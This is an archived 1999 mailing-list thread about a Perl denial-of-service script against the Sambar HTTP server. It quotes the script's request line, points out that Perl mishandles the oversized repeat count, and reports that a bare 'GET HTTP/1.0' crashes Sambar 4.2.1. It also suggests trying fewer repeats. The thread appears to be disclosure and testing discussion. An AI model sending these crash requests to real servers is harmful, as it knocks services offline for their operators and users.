I've tested it on sambar 4.2.1 and it's indeed GET HTTP/1.0 to crash the sambar server. Steve wrote: > On Mon, Oct 04, 1999 at 12:58:40AM -0000, Dennis Conrad wrote: > > #!/usr/bin/perl > > > > ######### > > # Sample DOS against the Sambar HTTP-Server > [snip] > > print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n"; > > Using that many 9s on my version of Perl fails silently. The above > seems equivalent to: print $remote "GET HTTP/1.0\n\n"; > > steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999;' > steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999 || die;' > Died at -e line 1. > steve@grok:/home/steve% perl -v > > This is perl, version 5.005_03 built for i386-freebsd > [etc.] > > I don't have a Sambar HTTP server to test against but it seems clear > that the code won't work the way the author expected. Perl doesn't > even try to build a string that long. If it did it would run out of > memory and then fail. > > I conclude that the script as posted will not DoS the server even if > it is vulnerable, unless a simple "GET HTTP/1.0" triggers the DoS. > > I suggest that until the nature of the DoS is clarified anyone using > the script to test their own server should try it as-is, then try it > with fewer 9s (probably 9999 or 99999, maybe more if it's a resource > exhaustion DoS).
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:05 PDT